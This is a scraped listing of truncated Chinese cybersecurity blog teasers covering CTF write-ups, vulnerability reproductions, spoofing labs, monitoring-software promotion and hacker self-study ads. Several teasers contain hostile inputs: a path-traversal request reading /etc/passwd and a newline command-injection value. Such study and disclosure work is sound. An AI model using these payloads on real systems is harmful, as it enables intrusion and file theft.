导语美国财政部近日对一名37岁的俄罗斯女子实施了制裁，原因是她参与了为俄罗斯精英和网络犯罪团伙洗钱的行为。这一行动旨在打击网络犯罪活动，保护国际金融市场的安全。本文将详细介绍制裁对象以及网络犯罪的持续演变。制裁俄罗斯洗钱人士根据美国财政…

计算机网络重点概念整理-第七章网络安全【期末复习|考研复习】

第七章网络安全【期末复习|考研复习】计算机网络系列文章传送门： 第一章计算机网络概述第二章物理层第三章数据链路层第四章网络层第五章传输层第六章应用层第七章网络安全计算机网络整理-简称&缩写文章目录第七章网络安全【期末复习|考研…

电脑监控软件哪些比较好用

电脑监控软件在当今信息化时代越来越受到人们的关注，它们可以用于保护公司的商业机密，防止员工在工作中做一些不恰当的事情，以及在家庭中监控孩子的上网行为等。本文将介绍一些比较好用的电脑监控软件： 一、域之盾软件这款软件…

云计算与ai人工智能对高防cdn的发展

高防CDN（Content Delivery Network）作为网络安全领域的一项关键技术，致力于保护在线内容免受各种网络攻击，包括分布式拒绝服务攻击（DDoS）等。然而，随着人工智能（AI）和大数…

文件加密，数据防泄密软件

文件加密和数据防泄密软件成为了保护信息安全的重要工具，它们可以有效地防止敏感数据的泄露和非法访问。发展历史文件加密和数据防泄密软件的发展历程可以追溯到上世纪90年代，当时随着互联网的普及和信息技术的不断发展，人们开始意识到信息…

什么是水坑攻击

水坑攻击 1. 水坑攻击的概念1. 水坑攻击的原理2. 水坑攻击的常用手段3. 典型水坑攻击事件 1. 水坑攻击的概念水坑攻击（Watering Hole Attack）是一种网络攻击方法，其名称来源于自然界的捕食方式。攻击者会通过前期的调查或各种社会工程手段…

中国黑客群体的收入，与国外的黑客调查问卷相比！竟然还有女黑客！

从圈外认知来说，黑客一直被认为是高收入群体，黑客有白帽和黑帽处于黑白两道的黑客会的技术都有些相似，但是却是对立的，白帽做网络安全，修补漏洞。黑帽各种破坏，挖数据，攻击漏洞。如果你对网络…

详解 DES加密技术 | 凯撒密码 | 栅栏密码

目录密码学恺撒密码栅栏密码消息和加密密码的三个特性算法和密钥对称算法公开密钥算法 DES对称加密技术 DES算法的安全性 DES算法的原理 DES算法的实现步骤 IP置换表和IP-1逆置换表函数f 子密钥ki S盒的工作原理 DES算法的应用误区密码学密码学是一门…

NSS [UUCTF 2022 新生赛]websign

NSS [UUCTF 2022 新生赛]websign 开题就给了提示 ban了F12，鼠标右键，CtrlU 可以用view-source: 别人的思路：ctrls下载页面，notepad打开

vm虚拟机保护技术简介EzMachine例题-vm逆向分析

文章目录前言0x1 虚拟机保护技术原理0x1A 关于调用约定0x1B Handler0x1C 指令 0x2 vm虚拟机逆向实战[GKCTF 2020]EzMachine题目分析，花指令去除Handler分析脚本编写前言关于虚拟机逆向的知识网上很少，我看了几篇感觉都看不太明白，最后还…

高防CDN与高防服务器：为什么高防服务器不能完全代替高防CDN

在当今的数字化时代，网络安全已经成为企业不容忽视的关键问题。面对不断增长的网络威胁和攻击，许多企业采取了高防措施以保护其网络和在线资产。然而，高防服务器和高防CDN是两种不同的安全解决方案，各自有其优势和局限性。在本文中…

透视俄乌网络战之五：俄乌网络战的总结

透视俄乌网络战之一：数据擦除软件透视俄乌网络战之二：Conti勒索软件集团（上） 透视俄乌网络战之三：Conti勒索软件集团（下） 透视俄乌网络战之四：西方科技巨头的力量俄乌网络战总结 1…

网络安全（黑客）-小白自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

什么是缓冲区溢出？

缓冲区溢出 1. 什么是缓冲区溢出2. 缓冲区溢出攻击的类型3. 攻击者如何利用缓冲区溢出4. 如何防止缓冲区溢出攻击 1. 什么是缓冲区溢出 （1）缓冲区缓冲区是一块连续的计算机内存区域，用于在将数据从一个位置移到另一位置时临时存储数据。这…

Javascript知识点详解：this关键字的指向问题

目录 this 关键字涵义实质使用场合使用注意点避免多层 this 避免数组处理方法中的 this 避免回调函数中的 this 绑定 this 的方法 Function.prototype.call() Function.prototype.apply() Function.prototype.bind() 箭头函数中的 this this 关键字涵义 t…

推特被封号怎么办？如何防封？

今年社交媒体巨头Twitter正式更名与标示为“X”，这一举措引发了广泛关注和讨论。马斯克称，此举是为了将推特重塑为一个广泛的通信和金融交易平台，打造一个像“微信”一样的万能应用程序，也就是“X”，并承诺推特将迅速进…

墨者学院 Ruby On Rails漏洞复现第一题（CVE-2018-3760）

打开 web 页面： 发现是Ruby，在Ruby 3.7.1和更低版本中，存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞： /assets/file:%2f%2f/etc/pas…

探索网络攻击：ARP断网、ARP欺骗和DNS欺骗实验解析

目录前言一、ARP概述 1.1 什么是ARP 1.2 ARP协议的基本功能 1.3 ARP缓存表 1.4 ARP常用命令二、ARP断网实验三、ARP欺骗实验 3.1 内网截获图片 3.2 HTTP账户密码获取四、DNS欺骗实验总结 🌈嗨！我是Filotimo__🌈。很高兴与大家相识&…

网络安全应急响应工具(系统痕迹采集)-FireKylin

文章目录网络安全应急响应工具(系统痕迹采集)-FireKylin1.FireKylin介绍【v1.4.0】 2021-12-20【v1.0.1】 2021-08-09 2.客户端界面Agent支持的操作系统FireKylinAgent界面使用方式比较传统方式与FireKylin比较无法可达目标的场景应用对比 3.使用教程设置语言Agent配置&#x…

2.2 - 网络协议 - IP协议，IP地址划分，报文格式，数据分片，抓包实战

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 IP协议 1、IP地址划分2、IP协议报文格式3、IP协议数…

panabit日志审计singleuser_action.php任意用户添加漏洞复现

文章目录 panabit日志审计singleuser_action.php任意用户添加漏洞复现0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 panabit日志审计singleuser_action.php任意用户添加漏洞复现 0x01 前言免责声明：请勿利用文章…

【漏洞复现】74cms任意文件读取

漏洞描述 74CMS 是一款国内用的比较多招聘网站管理系统（Job Board CMS），专注于招聘和人力资源领域的网站建设，存在任意文件读取漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律&#xff0c…

航空领袖《波音公司》被攻击勒索

全球航空航天业的领袖公司-波音竟然被黑客攻击勒索了？相比很多小伙伴对波音并不熟悉，波音公司是世界上最大的民用和军用飞机制造商之一。其客户分布在全球90多个国家，像国内很多民航都用的是波音。那就有小伙伴担心了那我做飞机不是就很危险了…

Python武器库开发-常用模块之time模块(十二)

常用模块之datetime模块(十二) 在本文中，我们将详细讨论datetime模块。我们将通过实例学习使用datetime模块中定义的不同的与时间相关的函数。 Python有一个名为datetime的模块，用于处理日期和时间。在深入学习之前，让我们创建一些与日期和…

大厂信息泄露-漏洞复现

目录大唐电信AC简介资产收集漏洞复现修复建议免费领取安全学习资料包！（私聊进群一起学习，共同进步）编辑大唐电信AC简介大唐电信科技股份有限公司是电信科学技术研究院（大唐电信科技产业集团&#xff09…

APP攻防--签名组件权限

前言上文说到了反编译的方式，这期就深入到APP内部，即客户端安全。安装包签名在Android操作系统中，每个应用程序（APP）安装包（APK）都必须经过数字签名，以确保应用的完整性和来源…

XCTF-RSA-2：baigeiRSA2、 cr4-poor-rsa

baigeiRSA2 题目描述 import libnum from Crypto.Util import number from functools import reduce from secret import flagn 5 size 64 while True:ps [number.getPrime(size) for _ in range(n)]if len(set(ps)) n:breake 65537 n reduce(lambda x, y: x*y, ps) m …

复现文件上传漏洞bypass

1，弱口令发现目标网站，为宝塔搭建的dedecms，于是自己服务器搭建同样的 2 get请求phpinfo() 有waf，上传文件有waf 3，寻找资料，发现是，宝塔的ngix防火墙。同样在自己的服务器上部署成功。顺便还看…

卓越进行时 | 聚焦网络安全学科建设深化校企合作协同育人

近日，由南京赛宁信息技术有限公司（赛宁网安）主办的“网络空间安全学科发展及产业学院平台运营模式专题研讨活动”在南京市未来科技城网络安全卓越中心举行，来自成都信息工程大学和四川省网络空间安全协会的多名专家学者齐聚江宁&a…

网络安全（黑客）-零基础自学

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全…

网络安全之CSRF漏洞原理和实战，以及CSRF漏洞防护方法

一、引言总体来说CSRF属于一种欺骗行为，是一种针对网站的恶意利用，尽管听起来像跨站脚本（XSS），但是与XSS非常不同，并且攻击方式几乎向佐。XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任…

高防IP的原理

高防IP，把域名解析到高防IP上(web事务只要把域名指向高防IP 即可。非web事务，把事务IP换成高防IP即可)一起在高防IP上设置转发规矩;所有公网流量都会走高防IP，通过端口协议转发的方法将用户的拜访通过高防IP转发到源站IP，一起将歹…

HTML基础标签详解——form表单、input标签、output标签、button标签、iframe标签

表单（form）是用户输入信息与网页互动的一种形式。大多数情况下，用户提交的信息会发给服务器，比如网站的搜索栏就是表单。表单由一种或多种的小部件组成，比如输入框、按钮、单选框或复选框。这些小部件称为控件&#…

DC系列 DC:4

DC:4 靶机文章目录 DC:4 靶机信息收集IP端口收集网页信息收集网站信息收集bp爆破反弹shellnc反弹内网信息收集收集jim用户的密码密码爆破 Charles用户密码收集提权teehee提权备注信息收集 IP端口收集用arp-scan 网段锁定ip nmap对端口服务进行详细扫描nmap -p- -sV …

Python武器库开发-常用模块之configparser模块(十六)

configparser模块(十六) ConfigParser模块在python3中修改为configparser.这个模块定义了一个ConfigParser类，该模块的作用就是用来读取配置文件的，使用模块中的RawConfigParser()、ConfigParser()、 SafeConfigParser()这三个方法，创建一个…

Geotrust证书

GeoTrust是著名的证书颁发机构DigiCert的品牌。GeoTrustSSL产品在Internet上提供从基本域名验证到扩展验证SSL标准支持的最高级验证的安全性。 GeoTrust OV（组织验证）证书验证域所有权和组织的存在。在颁发证书之前，会检查该组织在公共数据库…

2023网络钓鱼状况报告：ChatGPT等工具致网络钓鱼电子邮件数量激增1265%

近日，SlashNext发布了《2023年网络钓鱼状况报告》，报告显示：自ChatGPT于2022年11月推出以来，网络钓鱼电子邮件数量激增1265%，这标志着网络犯罪依托于人工智能进入了一个新的时代。该报告深入分析了2022年第四季度至2…

电脑监控软件怎样防止数据泄露丨实战干货分享

电脑监控软件大家应该都不陌生吧，原本它是国外的产物，只不过在02年的时候，在国内出现。一开始它的功能也仅限于监控应该的电脑画面，但是随着电脑问题逐渐增加，其他和公司企业管理、员工管理、防止数据泄露的功能就都…

网络安全自学手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

通过一道题目带你深入了解WAF特性、PHP超级打印函数、ASCII码chr()对应表等原理[RoarCTF 2019]Easy Calc 1

题目环境： 依此输入以下内容并查看回显结果 11 1’ index.php ls 到这里没思路了 F12查看源代码一定要仔细看啊，差点没找到，笑哭访问calc.php文件果然有点东西 PHP代码审计 error_reporting(0);关闭错误报告通过GET方式传参的参数num sho…

小白学安全-KunLun-M静态白盒扫描工具

一、KunLun-M简介 KunLun-M是一个完全开源的静态白盒扫描工具，支持PHP、JavaScript的语义扫描，基础安全、组件安全扫描，Chrome Ext\Solidity的基础扫描。开源地址：https://github.com/LoRexxar/Kunlun-M Cobra是一款源代码安全审计…

bool型的盲注

黑客（网络安全）技术——高效自学1.0

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学今天给大家分享一下，很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习…

node 第十七天使用rsa非对称加密实现前后端加密通信 JSEncrypt和node-rsa

什么是非对称加密加密过程需要两个钥匙, 公钥和私钥其中公钥用于加密明文, 私钥用于解密公钥加密的密文, 解密只可以用私钥公钥和私钥是一对一的关系公钥可以发送给用户, 不用担心泄露私钥需要保存在服务端, 不能泄露例如: 战场上，B要给A传递一条消息&#xf…

评国青、优青、杰青，到底需要什么级别的文章？五篇代表作如何选？

一到年底就听同事们讨论到底申报“杰青”、“优青”还是“国青”，那么，“杰青”到底是什么呢？它和“优青”、“国青”又有什么区别呢？ 杰青，全称“国家杰出青年基金获得者”，是国家自然科学基金里人才资助…

【黑客】最适合小白的学习顺序

一、黑客是什么原是指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。但后来，黑客一词已被用于泛指那些专门利用电脑网络搞破坏或者恶作剧的家伙。二、学习黑客技术的原因其实，网络信息空间安全已经成为海陆空之…

[SHCTF]web方向wp

[SHCTF]web方向wp [WEEK1]babyRCE题目源码wp [WEEK1]1zzphp题目源码wp [WEEK1]ez_serialize题目源码wp [WEEK1]登录就给flag题目wp [WEEK1]生成你的邀请函吧~题目源码wp [WEEK1]飞机大战题目wp [WEEK1]ezphp题目源码wp [WEEK2]no_wake_up题目源码wp [WEEK2]MD5的事就拜托了题目…

【网络奇幻之旅】那年我与大数据的邂逅

🌺个人主页：Dawn黎明开始 🎀系列专栏：网络奇幻之旅 ⭐每日一句：循梦而行，向阳而生 📢欢迎大家：关注🔍点赞👍评论📝收藏⭐️ 文章目录 &#x1f4…

网网络安全基础之php开发文件读取、写入功能的实现

前言续之前的系列，这里php开发的文件操作的内容读取以及文本写入的部分文件读取代码的实现 css代码本系列的php博客都是这个css，名字都是index.css /* css样式初始化 */ * {font-family: Poppins, sans-serif;margin: 0;padding: 0;box-sizing: …

【信息安全原理】——传输层安全（学习笔记）

📖 前言：为保证网络应用，特别是应用广泛的Web应用数据传输的安全性（机密性、完整性和真实性），可以在多个网络层次上采取安全措施。本篇主要介绍传输层提供应用数据安全传输服务的协议，包括&…

20分钟搭建Ubertooth One开源蓝牙测试工具

kali linux 2023 安装依赖（记得使用root用户搭建环境） 1、apt-get update 2、apt install ubertooth 更新共享库缓存 3、ldconfig 安装 Ubertooth 工具和驱动程序 4、插入Ubertooth One工具 5、ubertooth-util -v 备注：出现Firmwate v…

Misc | 相当于签到第二届“奇安信”杯网络安全技能竞赛

题目描述： 图片似乎经过了什么处理，你能否将其复原呢？ 密文： 下载附件，解压得到一张.jpg图片。解题思路： 1、一张图片，典型的图片隐写。放到Kali中，使用binwalk检测，确…

Misc | bucket 第二届“奇安信”杯网络安全技能竞赛

题目描述： 解密Base全家桶。密文： 下载附件，解压得到一个txt文本，打开如下。 3441344134363435344435323442344534423441343635353334353333323442343935413442353434393535354135333441344534353536353535333332353534413436…

COM病毒实验原理

001 实验内容编译生成com病毒，用com病毒对测试文件进行感染。002 实验目的了解COM病毒的原理，掌握COM病毒的分析及其修改过程。003 实验原理 COM文件是一种单段执行结构的文件，其执行文件代码和执行时内存映像完全相同，起始执…

【ATTCK】MITRE Caldera-插件

CALDERA是一个由python语言编写的红蓝对抗工具（攻击模拟工具）。它是MITRE公司发起的一个研究项目，该工具的攻击流程是建立在ATT&CK攻击行为模型和知识库之上的，能够较真实地APT攻击行为模式。通过CALDERA工具，安全…

漏洞复现--IP-guard flexpaper RCE

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

海康威视（iVMS）综合安防系统任意文件上传漏洞复现 [附POC]

文章目录海康威视（iVMS）综合安防系统任意文件上传漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议海康威视（iVMS）综合安防系统任意文件上传漏洞复…

约束条件的安全测试_报错注入

约束条件的安全测试_报错注入基于约束的SQL攻击报错注入

网络安全黑客技术自学

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

网络安全自学

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

为什么都说学医的转行网络安全行业更容易些?

网络系统坏了，被入侵破坏了，找安全工程师防护修补。如果没有修好，我可以不给钱，再找一家能修好的。但是看病就不一样了，就算医生没有给我治好病，也照样要收医疗费。这样的类比乍一听上去好像挺有道理&…

网络安全（黑客技术）—高效自学

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学今天给大家分享一下，很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习…

详解IP安全：IPSec协议簇 | AH协议 | ESP协议 | IKE协议

目录 IP安全概述 IPSec协议簇 IPSec的实现方式 AH（Authentication Header，认证头） ESP（Encapsulating Security Payload，封装安全载荷） IKE（Internet Key Exchange，因特网密钥…

CTFhub-RCE-文件包含

访问网站我们仔细看一下php代码，重点是 if (!strpos($_GET["file"], "flag")) { include $_GET["file"]; 这里有一个strpos(string,find,start)函数意思在string字符串中找find的位置,start是查找的开始位置那么这句代…

域名怎么注册？一步步教你如何注册自己的域名

在互联网时代，网站是个人或企业展示品牌形象和推广品牌的重要工具，而无论是个人还是企业，在建设网站时，都需要提前注册域名。那么域名应该怎么注册呢？从域名选择，到选择域名注册商，再到域名注册…

非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1（两种解法！）

题目环境： 没错，又是我，这群该死的黑客竟然如此厉害，所以我回去爆肝SQL注入，这次，再也没有人能拿到我的flag了做了好多这个作者出的题了，看来又要上强度了判断注入类型 username：a…

以太坊功能被滥用，从99,000名受害者那里窃取了6000万美元

导语：最近，以太坊的一个功能被不法分子滥用，导致99,000人在六个月内损失了总计6000万美元的加密货币。这一滥用行为是通过绕过钱包安全警报和篡改加密货币地址实现的。本文将为您详细介绍这一事件的背景和影响，并提供一些建议&…

恶意软件之系统病毒

病毒是迄今为止最常见的恶意软件类型之一。它是一种能够感染、破坏计算机设备，并在其运行系统上自我复制的程序。由于病毒是自我复制的，一旦安装并运行，它们就可以在同一网络上自动从一台设备传播到另一台设备，无需人为干预。病毒…

致远OA wpsAssistServlet 任意文件上传漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、产品简介致远OA互联新一代智慧型协同运营平台以中台的架构和技术…

XSS靶场level1解题思路

001 分析题目此时URL链接是： http://xss-ctf.xiejiahe.com/level1?nametest 第一关页面内容欢迎来到level1 欢迎用户test 一张图片 IT’S easy （它是容易的） payload的长度:4 可以看到此时URL链接拼接了一个name参数，值为test…

【proverif】proverif的语法3-认证协议的验证代码-案例分析

proverif-系列文章目录【proverif】proverif的下载安装和初使用【proverif】proverif的语法1-解决中间人攻击-代码详解【proverif】proverif的语法2-各种密码原语的编码【proverif】proverif的语法3-认证协议的验证代码-案例分析 (本文) 文章目录 proverif-系列文章目录前言一…

vulnhub靶场—matrix-breakout-2-morpheus靶机

一，实验环境靶机ip：192.168.150.131攻击机ip：192.168.150.130 二，信息收集 arp-scan -l 扫描网段，寻找靶机ip 使用工具nmap进行端口扫描 nmap -A -T4 -p- 192.168.150.131 通过信息收集发现了靶机有80和81这两个…

【ARL灯塔搭建详细教程】

文章目录前言一、前期准备二、安装docker及docker-compose三、安装ARL灯塔四、登录ARL灯塔前言 ARL（Asset Reconnaissance Lighthouse）资产侦查灯塔旨在快速发现并整理企业外网资产并为资产构建基础数据库，无需登录凭证或特殊访问即可主动…

赛宁网安获评“铸网-2023”江西省实网应急演练优秀支撑单位

近日，南京赛宁信息技术有限公司（赛宁网安）获得了江西省工业和信息化厅颁发的“优秀支撑单位”荣誉。该荣誉表彰是对赛宁网安在“铸网-2023”江西省工业领域网络安全实网应急演练中提供全程技术支撑能力的认可。本次实网应急演练聚焦工业企…

Positive Technologies: 致电银行验证不再有效

犯罪分子掌握了一种新的欺诈手段 Positive Technologies 对 2023 年第三季度的网络安全威胁进行了分析。根据该分析，攻击者继续调整其社交工程策略，并正在采用新的欺诈方案。在其中一个方案中，欺诈者找到了一种方法，如果网络钓鱼…

任意注册漏洞

目录一漏洞介绍二实战演示三漏洞修复本文由掌控安全学院 - 小博投稿一漏洞介绍 1.未验证邮箱/手机号情景：应用为了方便用户记录用户名，使用邮箱和手机号作为用户名（因此很多应用在注册的时候就要求用户填写，多数时候…

伊朗黑客对以色列科技行业发起恶意软件攻击

最近，安全研究人员发现了一场由“Imperial Kitten”发起的新攻击活动，目标是运输、物流和科技公司。 “Imperial Kitten”又被称为“Tortoiseshell”、“TA456”、“Crimson Sandstorm”和“Yellow Liderc”，多年来一直使用“Marcella Flore…

文件上传js、mime、黑名单校验以及相关例题讲解

文件上传系列上传就是将信息从个人计算机（本地计算机）传送至中央计算机（远程计算机）系统上，让网络上的人都能看到。将制作好的网页、文字、图片、视频等通过Web或者Ftp传送至互联网上的服务器系统，这一过…

漏洞-任意账号注册

一漏洞介绍 1.未验证邮箱/手机号情景：应用为了方便用户记录用户名，使用邮箱和手机号作为用户名（因此很多应用在注册的时候就要求用户填写，多数时候都会给用户发送激活信息，激活后才能登录） 缺陷&#xff…

CNVD-2021-27648：锐捷RG-UAC统一上网行为管理与审计系统信息泄露漏洞复现

文章目录锐捷RG-UAC统一上网行为管理与审计系统信息泄露（CNVD-2021-27648）漏洞复现0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.复现 0x06 修复建议锐捷RG-UAC统一上网行为管理与审计系统信息泄露（CNVD…

一款快速从数据库中提取信息工具

DataMiner 介绍 DataMiner是一款数据库自动抽取工具，用于快速从数据库中提取信息，目前支持 mysql、mssql、oracle、mongodb等数据库，可导出CSV、HTML。功能支持对所有数据库数据进行采样，并指定采样数量。支持对指定数据库…

2023年数据泄露事件频发，企业应该如何做好数据安全保护？

在当今数字化时代，每时每刻都会产生大量的数据，这些数据包含大量的敏感信息，网络犯罪者可以利用这些数据获取巨大的利益，由此他们会通过技术攻击、网络钓鱼等各种非法手段来获取，而这也导致数据泄露事件频频发生。以下…

第六届浙江省大学生网络与信息安全竞赛 2023年初赛/决赛 WEB方向 Writeup

-------------------【初赛】------------------- easy php 简单反序列化 __debuginfo()魔术方法打印所需调试信息，反序列化时候执行！ 链子如下： BBB::__debuginfo()->CCC::__toString()->AAA::__call()EXP： <?php…

汽车网络安全方案产品交付形态的思考

目录 1.问题引入 2.产品包需求 2.1 密码服务 2.2 密钥管理 2.3 证书管理

100G.的DDoS高防够用吗？

很多人以为100G的DDoS防御已经足够了，但殊不知DDoS攻击大小也是需要分行业类型的，比如游戏、金融、影视、电商甚至ZF或者行业龙头等等行业类型，都是大型DDoS攻击的重灾区，别说100G防御，就算300G防御服务器也不一定够用…

Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)

Juniper Networks Junos OS EX远程命令执行漏洞（CVE-2023-36845） 免责声明漏洞描述漏洞影响漏洞危害网络测绘Fofa: body"J-web" || title"Juniper Web Device Manager" 漏洞复现1. 构造poc2. 查看文件3. 执行命令免责声明仅用于技…

微信群BUG大揭秘！开启身份切换神器

前言最近微信群里出现了一个神秘的BUG，普通群成员竟然可以艾特全体成员。今天，就让我们一起揭秘这个令人震惊的微信群普通成员可全体成员的BUG 复现步骤复现步骤也很简单，前提条件就是要在PC客户端操作！首先得有个属于自己的群…

文件包含总结

文件包含注入总结漏洞描述文件包含漏洞指的是Web应用程序在包含文件时未进行充分的验证，导致攻击者可以通过构造恶意请求来包含并执行任意文件，包括本地文件或远程文件。和SQL注入等攻击方式一样，文件包含漏洞也是一种注入型漏洞&#…

漏洞复现--迪普DPTech VPN 任意文件读取

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

【网络奇缘】- 计算机网络|网络类型|性能指标

🌈个人主页: Aileen_0v0🔥系列专栏: 一见倾心,再见倾城 --- 计算机网络~💫个人格言:"没有罗马,那就自己创造罗马~" 目录计算机网络分类 1.根据范围分类编辑 2.按使用者分编辑 3.按交换技术分编辑4.按拓扑结构分 …

【华为HCIP | 华为数通工程师】ISIS 高频题（1）

个人名片： 🐼作者简介：一名大三在校生，喜欢AI编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️…

BUUCTF 被劫持的神秘礼物 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 某天小明收到了一件很特别的礼物，有奇怪的后缀，奇怪的名字和格式。小明找到了知心姐姐度娘，度娘好像知道这是啥，但是度娘也不知道里面是啥。。。你帮帮小明&#xff1…

【前沿学习】美国零信任架构发展现状与趋势研究

转自：美国零信任架构发展现状与趋势研究摘要为了应对日趋严峻的网络安全威胁，美国不断加大对零信任架构的研究和应用。自 2022 年以来，美国发布了多个零信任战略和体系架构文件，开展了多项零信任应用项目。在介绍美国零信任战略…

漏洞分析 | 漏洞调试的捷径：精简代码加速分析与利用

0x01前言近期，Microsoft威胁情报团队曝光了DEV-0950（Lace Tempest）组织利用SysAid的事件。随后，SysAid安全团队迅速启动了应急响应，以应对该组织的攻击手法。然而，在对漏洞的分析和复现过程中&#xff0c…

CTFhub-RCE-综合过滤练习

%0a、%0d、%0D%0A burp 抓包修改请求为 POST /?127.0.0.1%0als 列出当前目录返回包 http://challenge-135e46015a30567b.sandbox.ctfhub.com:10800/?ip127.0.0.1%0acd%09*here%0ac%27a%27t%09* _311632412323588.php

upload-labs(1-17关攻略详解)

upload-labs pass-1 上传一个php文件，发现不行但是这回显是个前端显示，直接禁用js然后上传 f12禁用再次上传，成功右键打开该图像即为位置，使用蚁剑连接连接成功 pass-2 源码 $is_upload false; $msg null; if (isse…

青少年CTF-WEB-Flag在哪里？

题目环境：F12查看源代码得到flag：qsnctf{1167716c-54f0-47da-baed-49e3b08dfaeb} 此题主要考察F12查看源代码的使用

经典ctf ping题目详解青少年CTF-WEB-PingMe02

题目环境： 根据题目名称可知这是一道CTF-WEB方向常考的知识点：ping地址随便ping一个地址查看接受的数据包?ip0.0.0.0 有回显数据，尝试列出目录文件堆叠命令使用’;作为命令之间的连接符，当上一个命令完成后，继续执…

【开源威胁情报挖掘2】开源威胁情报融合评价

基于开源信息平台的威胁情报挖掘综述写在最前面4 开源威胁情报融合评价开源威胁情报的特征与挑战4.1 开源威胁情报数据融合融合处理方法 4.1 开源威胁情报的质量评价4.1.1 一致性分析本体的定义与组成本体构建的层次 4.1.2 去伪去重4.1.3 数据融合分析 4.2 开源威胁情报质量及…

公司防泄密软件科普：防止公司文件泄露的软件有什么功能？哪个好？

公司防泄密软件的主要功能是保护企业的重要文件和数据，以防止未经授权的访问和泄露。以下是防泄密软件的一些常见功能： 1、数据加密：防泄密软件可以使用加密算法对文件进行加密，使得未经授权的人无法读取或复制文件。 2、文件备份…

【信息安全】浅谈IDOR越权漏洞的原理、危害和防范：直接对象引用导致的越权行为

前言 ┌──────────────────────────────────┐ │ 正在播放《越权访问》 - Hanser │ ●━━━━━━─────── 00:00 / 03:05 │ ↻ ◁ ❚❚ ▷ ⇆ └───────────────────────────────…

深入了解PHP中的经典一句话木马和变量传递漏洞

PHP作为一种广泛应用的服务器端脚本语言，虽然在Web开发中有着广泛的应用，但也因其灵活性而存在一些潜在的安全隐患。本文将深入探讨其中的两种安全漏洞：经典一句话木马和变量传递漏洞，以便更好地了解和防范这些潜在的威胁。经典…

【ATTCK】MITRE Caldera-emu插件

CALDERA是一个由python语言编写的红蓝对抗工具（攻击模拟工具）。它是MITRE公司发起的一个研究项目，该工具的攻击流程是建立在ATT&CK攻击行为模型和知识库之上的，能够较真实地APT攻击行为模式。通过CALDERA工具，安全…

ssrf学习笔记总结

SSRF概述服务器会根据用户提交的URL 发送一个HTTP 请求。使用用户指定的URL，Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤，就有可能存在“请求伪造”的…

2023年中职“网络安全“—Web 渗透测试①

2023年中职"网络安全"—Web 渗透测试① Web 渗透测试任务环境说明：1.访问地址http://靶机IP/task1，分析页面内容，获取flag值，Flag格式为flag{xxx}；2.访问地址http://靶机IP/task2，访问登录页面。…

华为数通HCIP 821BGP 知识点整理

个人名片： 🐼作者简介：一名大三在校生，喜欢AI编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️…

中间件安全：Apache Tomcat 弱口令.（反弹 shell 拿到服务器的最高控制权.）

中间件安全：Apache Tomcat 弱口令. Tomcat 是 Apache 软件基金会（Apache Software Foundation）的 Jakarta 项目中的一个核心项目，由 Apache、Sun 和其他一些公司及个人共同开发而成。通过弱口令登录后台，部署 war 包…

BUUCTF [BJDCTF2020]鸡你太美 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。来源： https://github.com/BjdsecCA/BJDCTF2020 密文： 下载附件，解压得到两个.gif图片。第一个gif图片： 第二个gif图片无法打开。…

【漏洞复现】泛微E-Office信息泄露漏洞(CVE-2023-2766)

